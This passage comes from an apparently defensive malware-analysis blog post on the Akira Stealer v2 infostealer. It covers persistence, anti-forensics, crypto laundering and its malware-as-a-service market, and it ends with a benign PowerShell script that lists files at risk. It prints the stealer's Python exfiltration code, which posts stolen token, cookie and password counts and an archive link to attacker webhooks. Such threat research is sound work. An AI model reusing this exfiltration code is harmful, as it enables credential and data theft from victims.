place.",[806,16427,16428],{},[1736,16429,16430],{},"Embed Notification",[1545,16432,16434],{"className":10501,"code":16433,"language":10503,"meta":863,"style":863},"# Build embed with key metadata\ntoken_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\nfields = [\n {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n]\npayload = {\n 'username':'Akira 💊',\n 'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n}\nrequests.post(webhook_url, json=payload, timeout=8)\n",[1524,16435,16436,16441,16446,16451,16456,16461,16466,16471,16476,16480,16485,16490,16495,16499],{"__ignoreMap":863},[1588,16437,16438],{"class":1590,"line":1591},[1588,16439,16440],{},"# Build embed with key metadata\n",[1588,16442,16443],{"class":1590,"line":864},[1588,16444,16445],{},"token_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\n",[1588,16447,16448],{"class":1590,"line":1814},[1588,16449,16450],{},"fields = [\n",[1588,16452,16453],{"class":1590,"line":1831},[1588,16454,16455],{}," {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n",[1588,16457,16458],{"class":1590,"line":2135},[1588,16459,16460],{}," {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n",[1588,16462,16463],{"class":1590,"line":2141},[1588,16464,16465],{}," {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n",[1588,16467,16468],{"class":1590,"line":2147},[1588,16469,16470],{}," {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n",[1588,16472,16473],{"class":1590,"line":2153},[1588,16474,16475],{}," {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n",[1588,16477,16478],{"class":1590,"line":2159},[1588,16479,13933],{},[1588,16481,16482],{"class":1590,"line":2165},[1588,16483,16484],{},"payload = {\n",[1588,16486,16487],{"class":1590,"line":11039},[1588,16488,16489],{}," 'username':'Akira 💊',\n",[1588,16491,16492],{"class":1590,"line":11045},[1588,16493,16494],{}," 'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n",[1588,16496,16497],{"class":1590,"line":11051},[1588,16498,8430],{},[1588,16500,16501],{"class":1590,"line":11057},[1588,16502,16503],{},"requests.post(webhook_url, json=payload, timeout=8)\n",[2738,16505,16506,16512],{},[2741,16507,16508,16511],{},[1736,16509,16510],{},"Delivery",": Sent to the attacker’s Discord/Telegram channel.",[2741,16513,16514,16517,16518,16521],{},[1736,16515,16516],{},"Embed Link",": Contains a clickable ",[1524,16519,16520],{},"download_url"," pointing to the ZIP on GoFile (or fallback host).",[806,16523,16524],{},[1736,16525,16526],{},"Raw Link Fallback",[1545,16528,16530],{"className":10501,"code":16529,"language":10503,"meta":863,"style":863},"# Ensure attacker always has direct URL, even if embeds fail\nmessage = f\"📥 Archive available at: {download_url}\"\nrequests.post(webhook_url, data={'message': message}, timeout=8)\n",[1524,16531,16532,16537,16542],{"__ignoreMap":863},[1588,16533,16534],{"class":1590,"line":1591},[1588,16535,16536],{},"# Ensure attacker always has direct URL, even if embeds fail\n",[1588,16538,16539],{"class":1590,"line":864},[1588,16540,16541],{},"message = f\"📥 Archive available at: {download_url}\"\n",[1588,16543,16544],{"class":1590,"line":1814},[1588,16545,16546],{},"requests.post(webhook_url, data={'message': message}, timeout=8)\n",[2738,16548,16549],{},[2741,16550,16551,16554],{},[1736,16552,16553],{},"Plain Text",": Guarantees delivery of the link in case embeds are blocked or silently dropped.",[806,16556,16557],{},[1736,16558,16559],{},"How the Attacker Retrieves the Link",[806,16561,16562,16565],{},[1736,16563,16564],{},"1. Webhook Infrastructure","\nThe attacker embeds the webhook endpoint in the malware configuration:",[1545,16567,16569],{"className":10501,"code":16568,"language":10503,"meta":863,"style":863},"# at class initialization\nself.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[1524,16570,16571,16576],{"__ignoreMap":863},[1588,16572,16573],{"class":1590,"line":1591},[1588,16574,16575],{},"# at class initialization\n",[1588,16577,16578],{"class":1590,"line":864},[1588,16579,16580],{},"self.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[2738,16582,16583,16590],{},[2741,16584,16585,2545,16587],{},[1736,16586,7358],{},[1524,16588,16589],{},"https://discord.com/api/webhooks/\u003CWEBHOOK_ID>/\u003CWEBHOOK_TOKEN>",[2741,16591,16592,2545,16595],{},[1736,16593,16594],{},"Telegram",[1524,16596,16597],{},"https://api.telegram.org/bot\u003CTELEGRAM_TOKEN>/sendMessage",[806,16599,16600,16603],{},[1736,16601,16602],{},"2. Real-Time Delivery","\nImmediately after a successful file upload, the malware executes:",[1545,16605,16607],{"className":10501,"code":16606,"language":10503,"meta":863,"style":863},"payload = {\n 'username': 'Akira 💊',\n 'embeds': [{\n 'title': '🗄️ Exfiltration Complete',\n 'fields': [\n {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n ]\n }]\n}\n# Transmit the archive URL entirely in the JSON body\nrequests.post(self.default_webhook, json=payload, timeout=8)\n",[1524,16608,16609,16613,16618,16623,16628,16633,16638,16643,16648,16652,16657],{"__ignoreMap":863},[1588,16610,16611],{"class":1590,"line":1591},[1588,16612,16484],{},[1588,16614,16615],{"class":1590,"line":864},[1588,16616,16617],{}," 'username': 'Akira 💊',\n",[1588,16619,16620],{"class":1590,"line":1814},[1588,16621,16622],{}," 'embeds': [{\n",[1588,16624,16625],{"class":1590,"line":1831},[1588,16626,16627],{}," 'title': '🗄️ Exfiltration Complete',\n",[1588,16629,16630],{"class":1590,"line":2135},[1588,16631,16632],{}," 'fields': [\n",[1588,16634,16635],{"class":1590,"line":2141},[1588,16636,16637],{}," {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n",[1588,16639,16640],{"class":1590,"line":2147},[1588,16641,16642],{}," ]\n",[1588,16644,16645],{"class":1590,"line":2153},[1588,16646,16647],{}," }]\n",[1588,16649,16650],{"class":1590,"line":2159},[1588,16651,8430],{},[1588,16653,16654],{"class":1590,"line":2165},[1588,16655,16656],{},"# Transmit the archive URL entirely in the JSON body\n",[1588,16658,16659],{"class":1590,"line":11039},[1588,16660,16661],{},"requests.post(self.default_webhook, json=payload, timeout=8)\n",[2738,16663,16664,16672],{},[2741,16665,8620,16666,16668,16669,2786],{},[1524,16667,16520],{}," variable is interpolated into the embed’s ",[1524,16670,16671],{},"fields.value",[2741,16673,16674,16675,16677,16678,8234],{},"For Telegram fallback, the ",[1524,16676,16520],{}," appears in the plain-text ",[1524,16679,929],{},[806,16681,16682],{},[1736,16683,16684],{},"3. EDR & Forensic Visibility Limitations",[2738,16686,16687,16696],{},[2741,16688,16689,16692,16693,16695],{},[1736,16690,16691],{},"No Local Logging",": The malware does not write the ",[1524,16694,16520],{}," to disk or system logs.",[2741,16697,16698,16701],{},[1736,16699,16700],{},"EDR Blind Spots",": Tools like Microsoft Defender for Endpoint may flag the HTTP request attempt but cannot extract the embedded URL.",[806,16703,16704],{},[1736,16705,16706],{},"4. Why the Analyst Cannot Recover This Locally:",[2738,16708,16709,16722,16741],{},[2741,16710,16711,16714,16715,16717,16718,16721],{},[1736,16712,16713],{},"No Local Copy of Link",": The malware writes the ",[1524,16716,16520],{}," only in memory and transmits it over the network; it does ",[4655,16719,16720],{},"not"," save this URL to disk or logs.",[2741,16723,16724,16727,16728,16730,2781,16735,16737,16738,2786],{},[1736,16725,16726],{},"Ephemeral Staging Cleanup",": Immediately after upload, the code executes:",[2016,16729],{},[1588,16731,16734],{"className":16732},[16733],"text-monospace","shutil.rmtree(ROOT)",[2016,16736],{},"\nerasing all staged artifacts (including any transient text files) from ",[1524,16739,16740],{},"%TEMP%",[2741,16742,16743,16746,16747,16750],{},[1736,16744,16745],{},"Network-Only Transmission",": Webhook calls (",[1524,16748,16749],{},"requests.post",") occur in-memory; no HTTP logs or browser history entries are created on the victim machine.",[3587,16752,16753],{},[806,16754,16755,16758,16759,16761,16762,16764],{},[1736,16756,16757],{},"Implication for Analysts:","\nWithout live packet capture (e.g., network TAP or proxy) at the time of execution, the exact ",[1524,16760,16520],{}," is unrecoverable post-infection.\nAdditionally, the exfiltrated archive is auto-deleted from the hosting service, further reducing the window for forensic retrieval.\nPost-infection imaging or host-based forensic recovery will ",[4655,16763,16720],{}," reveal the attacker’s URL or file host credentials, as no artifacts remain locally.",[1541,16766],{"className":16767},[6875,6876],[810,16769,16771],{"id":16770},"_713-conclusion","7.13 Conclusion",[806,16773,1536],{},[806,16775,16776,16778],{},[1524,16777,6643],{}," (Akira Stealer v2) is a comprehensive, commercially distributed stealer toolkit. It combines extensive targeting, sophisticated anti-analysis, dynamic infrastructure control, and full-stack data theft across credentials, crypto, system profiling, and user files. Its modularity and stealth, combined with rapid reinfection methods, make it one of the most technically advanced stealers observed in active deployment.",[1511,16780,16782],{"id":16781},"_8-circular-execution-chain-a-self-healing-loop","8. Circular Execution Chain: A Self-Healing Loop",[806,16784,816],{},[806,16786,16787,16788,16791],{},"One of the most technically sophisticated elements of this campaign is its regenerative, circular execution model. Unlike conventional malware with linear stages that flow from dropper to payload and then vanish, this operation was engineered like a ",[1736,16789,16790],{},"closed loop"," — where every component watches over the others.",[806,16793,16794,16795,16798],{},"This ",[1736,16796,16797],{},"self-healing architecture"," made the infection chain not only persistent, but also autonomous. It could fully recover from partial removals. As long as one piece remained alive, the entire malware ecosystem could reassemble itself.",[810,16800,16802],{"id":16801},"_81-behavioral-breakdown","8.1 Behavioral Breakdown",[806,16804,1536],{},[4351,16806,16807,16833,16846,16877,16895],{},[2741,16808,16809,16814,16816,16817,16820,16821,16823,16824,16826,16827,16829,16830,16832],{},[1736,16810,16811,16812,2772],{},"Persistence Anchor (",[1524,16813,6635],{},[1524,16815,6635],{}," acts as the foundational foothold. It is typically dropped into a Windows user startup location, such as ",[1524,16818,16819],{},"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup",", or registered via ",[1524,16822,7686],{},". Its job is simple but critical: ensure ",[1524,16825,6639],{}," is present and launch it silently during user logon. If ",[1524,16828,6639],{}," is missing, it re-extracts the archive ",[1524,16831,7852],{}," (located in a temp folder or dropped anew), regenerating the full Electron app structure.",[2741,16834,16835,16840,16842,16843,16845],{},[1736,16836,16837,16838,2772],{},"Bridge Loader (",[1524,16839,6639],{},[1524,16841,6639],{}," is the Electron-wrapped Node.js application. It doesn’t expose any GUI and operates entirely in the background. Upon execution, it runs the embedded JavaScript logic within ",[1524,16844,7089],{},", using Node.js as a runtime environment. This abstraction layer decouples the core logic from the PE stub, helping to evade traditional analysis.",[2741,16847,16848,16853,16854,16856,16857],{},[1736,16849,16850,16851,2772],{},"Execution Orchestrator (",[1524,16852,8830],{},"\nEmbedded within ",[1524,16855,7089],{},", this is the true controller of the infection chain. Its key functions include:",[2738,16858,16859,16865,16868],{},[2741,16860,16861,16862,16864],{},"Checking for the presence of ",[1524,16863,6635],{}," and redeploying it if missing",[2741,16866,16867],{},"Dynamically injecting runtime configuration: webhook URLs, C2 addresses, tokens",[2741,16869,16870,16871,16873,16874,16876],{},"Either invoking the already-present Python payload (",[1524,16872,6643],{},") or downloading it as part of a ZIP bundle (e.g., ",[1524,16875,8894],{},") from attacker-controlled infrastructure",[2741,16878,16879,16884,16885,16887,16888,16890,16891,16894],{},[1736,16880,16881,16882,2772],{},"Payload Execution (",[1524,16883,6643],{},"\nOnce triggered, ",[1524,16886,6643],{}," executes in memory via ",[1524,16889,6615],{},". It systematically collects saved credentials, cookies, Discord tokens, browser session data, and cryptocurrency wallet extensions. The data is staged in a ZIP archive and exfiltrated via HTTPS — commonly to Discord webhooks, but fallback APIs like ",[1524,16892,16893],{},"gofile.io"," or custom C2 endpoints have also been observed.",[2741,16896,16897,16900,16901,16903,16904,16906,16907,16909,16910,16912,16913,16915],{},[1736,16898,16899],{},"Loop Integrity and Self-Healing","\nThe design is circular. If ",[1524,16902,6635],{}," is deleted, it will be redeployed. If ",[1524,16905,6639],{}," is missing, ",[1524,16908,6635],{}," re-extracts it from ",[1524,16911,7852],{},". If ",[1524,16914,6643],{}," is deleted, it is re-obtained by the JavaScript layer. This interdependency makes the malware resilient and capable of reconstructing its execution chain from virtually any surviving fragment.",[806,16917,16918,16919,16922],{},"This architecture is not just modular — it’s ",[1736,16920,16921],{},"self-sustaining",", deliberately engineered for stealth, flexibility, and long-term survivability in target environments.",[810,16924,16926],{"id":16925},"_82-why-this-is-noteworthy","8.2 Why This Is Noteworthy",[806,16928,1536],{},[806,16930,16931,16932,2786],{},"The campaign’s architectural design reflects a level of sophistication not typically seen in commodity infostealers. It goes beyond simple multi-stage loaders — this is malware engineered for ",[1736,16933,16934],{},"operational resilience, stealth, and automation",[806,16936,16937],{},[1736,16938,16939],{},"Key Characteristics",[2738,16941,16942,16948,16985,17005],{},[2741,16943,16944,16947],{},[1736,16945,16946],{},"Full Autonomy","\nOnce deployed, the malware requires no user interaction or external reactivation. It acts like a malicious microservice — orchestrating its own persistence, payload execution, and repair routines without external control.",[2741,16949,16950,16953,16954],{},[1736,16951,16952],{},"Multi-Language Execution Stack","\nThe toolchain integrates:",[2738,16955,16956,16965,16971,16977],{},[2741,16957,16958,2887,16961,2289,16963,2772],{},[1736,16959,16960],{},"PE Binaries",[1524,16962,6635],{},[1524,16964,6639],{},[2741,16966,16967,16970],{},[1736,16968,16969],{},"Node.js / JavaScript"," (via Electron)",[2741,16972,16973,16976],{},[1736,16974,16975],{},"PowerShell"," (used for obfuscated payload relay)",[2741,16978,16979,2887,16982,16984],{},[1736,16980,16981],{},"Python",[1524,16983,6643],{},", executed as memory-resident stealer)\nThis layered composition makes it harder to profile, fingerprint, and analyze using conventional static tools.",[2741,16986,16987,16990,16991],{},[1736,16988,16989],{},"Defense Evasion by Design","\nEvery component is encoded, encrypted, or dynamically injected:",[2738,16992,16993,16996,16999,17002],{},[2741,16994,16995],{},"Base64 PowerShell relay",[2741,16997,16998],{},"AES-encrypted and GZIP-compressed Python core",[2741,17000,17001],{},"Obfuscated JavaScript with runtime token injection",[2741,17003,17004],{},"Self-healing behavior that frustrates partial removal",[2741,17006,17007,17010,17011,16912,17014,17016,17017,17019],{},[1736,17008,17009],{},"No Single Point of Failure","\nThe malware’s self-repair logic ensures that ",[1736,17012,17013],{},"removal of a single component is insufficient",[1524,17015,6635],{}," is removed, the info stealer recreates it. If ",[1524,17018,6643],{}," is deleted, it is redownloaded and redeployed by the JavaScript controller.",[806,17021,17022,17023,17026],{},"In short, the malware behaves more like a ",[1736,17024,17025],{},"distributed system"," than a typical payload — one that prioritizes survivability, modularity, and stealth.",[806,17028,17029,17030,17033],{},"This elevates the threat from an opportunistic attack to a ",[1736,17031,17032],{},"resilient, adaptive platform"," — requiring defenders to match its complexity with equally layered detection and response strategies.",[810,17035,17037],{"id":17036},"_83-implications-for-blue-teams","8.3 Implications for Blue Teams",[806,17039,1536],{},[806,17041,17042],{},"For defenders and CSOC operators, this kind of architecture raises the bar:",[2738,17044,17045,17051,17066],{},[2741,17046,17047,17050],{},[1736,17048,17049],{},"Partial cleanup is ineffective",". All nodes must be identified and removed simultaneously.",[2741,17052,17053,17056,17057,17059,17060,17059,17062,17059,17064,2786],{},[1736,17054,17055],{},"Defender for Endpoint correlation"," is essential. Analysts must trace full chains: from ",[1524,17058,6635],{}," → ",[1524,17061,7144],{},[1524,17063,7239],{},[1524,17065,6615],{},[2741,17067,17068,17071],{},[1736,17069,17070],{},"IOC-free persistence"," means memory-based heuristics, telemetry baselining, and chain-based detection are key.",[806,17073,17074,17075,17078],{},"This isn’t just a stealer. It’s a ",[1736,17076,17077],{},"resilient malware platform"," — behaving more like a distributed system than a simple threat. And that’s exactly what makes it both impressive and dangerous.",[1511,17080,17082],{"id":17081},"_9-blockchain-tracking-and-analysis","9. Blockchain Tracking and Analysis",[806,17084,816],{},[810,17086,17088],{"id":17087},"_91-tracing-fund-distribution-in-a-litecoin-based-malware-campaign","9.1 Tracing Fund Distribution in a Litecoin-Based Malware Campaign",[806,17090,1536],{},[806,17092,17093,17094,17097],{},"During the reverse engineering phase of this malware campaign, we extracted multiple hardcoded wallet addresses used by the stealer for cryptocurrency exfiltration. By following the on-chain activity of these Litecoin wallets, we were able to uncover patterns indicative of deliberate money laundering tactics. The attacker-controlled wallet ",[1524,17095,17096],{},"LW6EopiZ..."," acts as a central aggregation point. Funds stolen from multiple victims are funneled into this address, after which they are rapidly redistributed across multiple new addresses.",[806,17099,17100],{},"The behavior seen here is representative of a classic split-transfer pattern used in crypto tumbling or mixing operations. In each instance, the full incoming balance is divided into two roughly proportional outbound transactions, each sent to a different wallet. This strategy is designed to hinder address clustering and chain tracing by obfuscating the provenance of funds. It’s an effective tactic to evade detection by automated blockchain analytics and threat intelligence platforms.",[806,17102,17103],{},"This laundering behavior leverages a combination of transaction timing, precise value splitting, and address reuse minimization to bypass heuristics commonly applied by clustering algorithms like those used in GraphSense, Chainalysis, or TRM Labs. The overall intent is to create high-entropy transactional flows, which confuse attribution and disrupt linkability, especially when the funds are eventually bridged across other assets or swapped into privacy-focused coins.",[806,17105,17106],{},"In the example below, we show a structured subset of this behavior. The incoming transactions represent distinct victim transfers. These values are then perfectly mapped to outbound flows, showing the coins being \"washed\" through fast, predictable, and algorithmically split payouts.",[1902,17108,1905,17111],{"className":17109,"style":10692},[17110],"font-size-1",[1923,17112,17113,1905,17136,1905,17168,1905,17196,1905,17225],{},[1911,17114,1909,17115,1909,17119,1909,17123,1909,17126,1909,17130,1909,17133,1905],{},[1915,17116,17118],{"style":17117},"text-align: left; width: 14%;","Input Source",[1915,17120,17122],{"style":17121},"text-align: left; width: 12%;","Input Date",[1915,17124,17125],{"style":17117},"Amount In (LTC)",[1915,17127,17129],{"style":17128},"text-align: left; width: 20%;","→ Attacker Wallet",[1915,17131,17132],{"style":12313},"Output Addresses",[1915,17134,17135],{"style":10861},"Total Out (LTC)",[1911,17137,1909,17138,1909,17141,1909,17144,1909,17147,1909,17153,1909,17166,1905],{},[1928,17139,17140],{},"Input_1",[1928,17142,17143],{},"2024-09-21",[1928,17145,17146],{},"0.25339198",[1928,17148,1913,17149,1909],{},[1588,17150,17152],{"title":17151},"LLQtaBnSAFpCFUw5cXRRka7Nvtrs4Up9bH","LLQtaBnSAF...",[1928,17154,17155,17156,17159,17160,17155,17162,17165],{},"\n - ",[1524,17157,17158],{},"LZmHkgkED..."," (0.15579078, 2024-09-26)",[2016,17161],{},[1524,17163,17164],{},"M8JpDsw5H7..."," (0.09760120, 2024-09-26)\n ",[1928,17167,17146],{},[1911,17169,1909,17170,1909,17173,1909,17176,1909,17179,1909,17183,1909,17194,1905],{"style":10717},[1928,17171,17172],{},"Input_2",[1928,17174,17175],{},"2024-04-16",[1928,17177,17178],{},"1.09976044",[1928,17180,1913,17181,1909],{},[1588,17182,17152],{"title":17151},[1928,17184,17155,17185,17188,17189,17155,17191,17193],{},[1524,17186,17187],{},"LgWrCAF8ED..."," (0.84304664, 2024-06-13)",[2016,17190],{},[1524,17192,17187],{}," (0.25671380, 2024-06-13)\n ",[1928,17195,17178],{},[1911,17197,1909,17198,1909,17201,1909,17204,1909,17207,1909,17211,1909,17223,1905],{},[1928,17199,17200],{},"Input_3",[1928,17202,17203],{},"2024-03-06",[1928,17205,17206],{},"0.77089346",[1928,17208,1913,17209,1909],{},[1588,17210,17152],{"title":17151},[1928,17212,17155,17213,17216,17217,17155,17219,17222],{},[1524,17214,17215],{},"LZL3wQcSRP..."," (0.38544673, 2024-03-04)",[2016,17218],{},[1524,17220,17221],{},"M8kiBpVHG3..."," (0.38544673, 2024-03-04)\n ",[1928,17224,17206],{},[1911,17226,1909,17227,1909,17230,1909,17232,1909,17234,1909,17238,1909,17248,1905],{"style":10717},[1928,17228,17229],{},"Input_4",[1928,17231,17203],{},[1928,17233,17206],{},[1928,17235,1913,17236,1909],{},[1588,17237,17152],{"title":17151},[1928,17239,17155,17240,17216,17243,17155,17245,17222],{},[1524,17241,17242],{},"LUFLTrqYpix...",[2016,17244],{},[1524,17246,17247],{},"La22dfH9eM...",[1928,17249,17206],{},[1541,17251],{"className":17252},[6875,6876],[1511,17254,17256],{"id":17255},"_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","10. Inside the Akira Ecosystem – Commercialized Cybercrime Infrastructure",[806,17258,816],{},[806,17260,17261],{},"Akira is not just a stealer—it’s the centerpiece of a thriving underground ecosystem designed to simplify, scale, and monetize cybercrime.",[810,17263,17265],{"id":17264},"_101-a-plug-and-play-ecosystem-for-threat-actors","10.1 A Plug-and-Play Ecosystem for Threat Actors",[806,17267,1536],{},[806,17269,17270],{},"The Akira ecosystem exemplifies the evolution of cybercrime into a professionalized, service-driven economy. It includes:",[2738,17272,17273,17282,17288,17294,17300],{},[2741,17274,17275,17278,17279,2772],{},[1736,17276,17277],{},"Builder Bots"," for on-demand payload generation (e.g., ",[1524,17280,17281],{},"@AkiraRedBot",[2741,17283,17284,17287],{},[1736,17285,17286],{},"Telegram channels"," for updates, feature requests, and customer support",[2741,17289,17290,17293],{},[1736,17291,17292],{},"Automated licensing and payment handling",", often via direct messages or anonymous e-commerce platforms like Sellix",[2741,17295,17296,17299],{},[1736,17297,17298],{},"Bundled modules"," such as clipboard hijackers, Discord token loggers, browser data stealers, and even ransomware add-ons",[2741,17301,17302,17305],{},[1736,17303,17304],{},"Customizable payloads"," with configuration interfaces allowing toggles, webhook input, and icon branding",[806,17307,17308],{},[1449,17309],{"alt":17310,"src":17311},"Akira Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797420/blog/pics/akira-stealer-v2.jpg",[810,17313,17315],{"id":17314},"_102-commercialization-of-cybercrime","10.2 Commercialization of Cybercrime",[806,17317,1536],{},[806,17319,17320],{},"Akira's structure reflects a broader movement toward \"Malware-as-a-Service\" (MaaS), where:",[2738,17322,17323,17329,17335,17341],{},[2741,17324,17325,17328],{},[1736,17326,17327],{},"No deep technical skill"," is required to launch attacks",[2741,17330,17331,17334],{},[1736,17332,17333],{},"Low entry costs"," ($75 for 3 months, $150 for lifetime)",[2741,17336,17337,17340],{},[1736,17338,17339],{},"Instant support and documentation"," through Telegram",[2741,17342,17343,17346],{},[1736,17344,17345],{},"Community contributions"," regularly extend Akira with scripts and feature suggestions",[806,17348,17349],{},"This ecosystem mirrors legitimate SaaS business models — with changelogs, UX improvements, pricing tiers, and upsells.",[806,17351,17352],{},[1449,17353],{"alt":17354,"src":17355},"Akria Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797061/blog/pics/akira-stealer.jpg",[810,17357,17359],{"id":17358},"_103-beyond-the-stealer-the-ecosystems-components","10.3 Beyond the Stealer – The Ecosystem's Components",[806,17361,1536],{},[806,17363,7742,17364,17366],{},[1524,17365,6643],{}," is the heart of many attacks, the ecosystem provides a full chain:",[2738,17368,17369,17372,17375,17378,17381],{},[2741,17370,17371],{},"Obfuscation tools like PyInstaller wrappers",[2741,17373,17374],{},"File binders for coupling malicious payloads with benign software",[2741,17376,17377],{},"Compilers, crypters, and runtime polymorphism",[2741,17379,17380],{},"Hosting mirrors for payload delivery and exfiltration (e.g., GoFile, AnonFiles)",[2741,17382,17383],{},"Data management bots that summarize stolen credentials and hardware profiles",[806,17385,17386],{},[1449,17387],{"alt":17388,"src":17389},"Akira Bot","https://res.cloudinary.com/c4a8/image/upload/v1749797107/blog/pics/akira-bot.jpg",[1511,17391,17393],{"id":17392},"_11-akira-stealer-quickcheck-affected-files","11. Akira Stealer QuickCheck affected files",[806,17395,816],{},[810,17397,17399],{"id":17398},"_111-what-is-this-for","11.1 What Is This For?",[806,17401,1536],{},[806,17403,17404,17405,2289,17408,2289,17411,8210,17414,17417],{},"After a suspected Akira Stealer infection, it's critical to know immediately which files on your system were at risk of exfiltration. The QuickCheck PowerShell script outlined above replicates Akira's exact search logic: it scans the user's ",[1736,17406,17407],{},"Desktop",[1736,17409,17410],{},"Documents",[1736,17412,17413],{},"Downloads",[1736,17415,17416],{},"OneDrive"," folders for files that:",[2738,17419,17420,17436,17439],{},[2741,17421,17422,17423,2289,17426,2289,17429,17432,17433],{},"Contain sensitive keywords in their filename, such as ",[1524,17424,17425],{},"password",[1524,17427,17428],{},"wallet",[1524,17430,17431],{},"backup",", or ",[1524,17434,17435],{},"token",[2741,17437,17438],{},"Have specific extensions commonly targeted (.txt, .docx, .pdf, .jpg, etc.)",[2741,17440,17441],{},"Are under the 2 MB size limit imposed by the malware",[806,17443,17444,17445,17448],{},"While QuickCheck offers a rapid overview based on Akira Stealer’s internal logic, ",[1736,17446,17447],{},"it is not a substitute"," for comprehensive forensic tools or professional incident response. Always follow up with deeper analysis when dealing with confirmed breaches.",[806,17450,17451,17452,2289,17455,2289,17458,17461,17462,2786],{},"It then presents a sorted table of ",[1736,17453,17454],{},"Filename",[1736,17456,17457],{},"Relative Path",[1736,17459,17460],{},"Size (KB)"," and the ",[1736,17463,17464],{},"trigger keyword",[3587,17466,17467],{},[806,17468,17469,17472,17473,17476,17477,17479,17480,17483],{},[1736,17470,17471],{},"DISCLAIMER","\nThis tool is provided ",[1736,17474,17475],{},"“as is”"," without any warranty of completeness or fitness for a particular purpose. It does ",[1736,17478,16720],{}," guarantee detection of ",[1736,17481,17482],{},"all"," potentially sensitive files, nor does it replace full malware forensics. Use at your own risk.",[1541,17485],{"className":17486},[6875],[810,17488,17490],{"id":17489},"legal-notice","Legal Notice",[806,17492,1536],{},[806,17494,17495,17496,17499,17500,17503],{},"This QuickCheck Utility is intended for ",[1736,17497,17498],{},"defensive security"," assessments only. Any unauthorized scanning or usage on systems you do not own may violate privacy, copyright, or computer misuse laws. glueckkanja AG assumes ",[1736,17501,17502],{},"no liability"," for misuse or damages resulting from its use.",[810,17505,17507],{"id":17506},"powershell-script","PowerShell Script",[806,17509,1536],{},[1545,17511,17513],{"className":7708,"code":17512,"language":7710,"meta":863,"style":863},"\u003C#\n.SYNOPSIS\n QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n\n.DESCRIPTION\n Scans Desktop, Documents, Downloads and OneDrive for files that:\n • Contain one of the defined keywords in their name\n • Have an allowed file extension\n • Are not larger than 2 MB\n Presents the results in a colored, tabular overview.\n\n.NOTES\n © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n#>\n\n# -------------------------------------\n# 1. Configuration\n# -------------------------------------\n$scanFolders = @(\n \"$env:USERPROFILE\\Desktop\",\n \"$env:USERPROFILE\\Documents\",\n \"$env:USERPROFILE\\Downloads\",\n \"$env:USERPROFILE\\OneDrive\"\n)\n$keywords = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n$maxSize = 2MB\n\n# -------------------------------------\n# 2. Scan and Collect Matches\n# -------------------------------------\n$matches = [System.Collections.Generic.List[PSObject]]::new()\n\nforeach ($folder in $scanFolders) {\n if (-not (Test-Path $folder)) { continue }\n Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n # 2.1 Extension filter\n if ($extensions -notcontains $_.Extension.ToLower()) { return }\n # 2.2 Size filter\n if ($_.Length -gt $maxSize) { return }\n\n # 2.3 Keyword filter: explicit loop to avoid null-method calls\n $hit = $null\n foreach ($kw in $keywords) {\n if ($_.Name.ToLower().Contains($kw)) {\n $hit = $kw\n break\n }\n }\n if (-not $hit) { return }\n\n # 2.4 Build relative path\n $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n\n # 2.5 Collect\n $matches.Add([PSCustomObject]@{\n FileName = $_.Name\n Location = $rel\n 'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n Keyword = $hit\n })\n }\n}\n\n# -------------------------------------\n# 3. Display Results\n# -------------------------------------\nclear\nWrite-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\nWrite-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n\nif ($matches.Count -gt 0) {\n $matches |\n Sort-Object Location, FileName |\n Format-Table -AutoSize `\n @{Label='File'; Expression={$_.FileName}},\n @{Label='Location'; Expression={$_.Location}},\n @{Label='Size (KB)'; Expression={$_. 'Size (KB)'}},\n @{Label='Keyword'; Expression={$_.Keyword}}\n\n Write-Host \"`n⚠️ Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n}\nelse {\n Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n}\n\nWrite-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\nWrite-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor 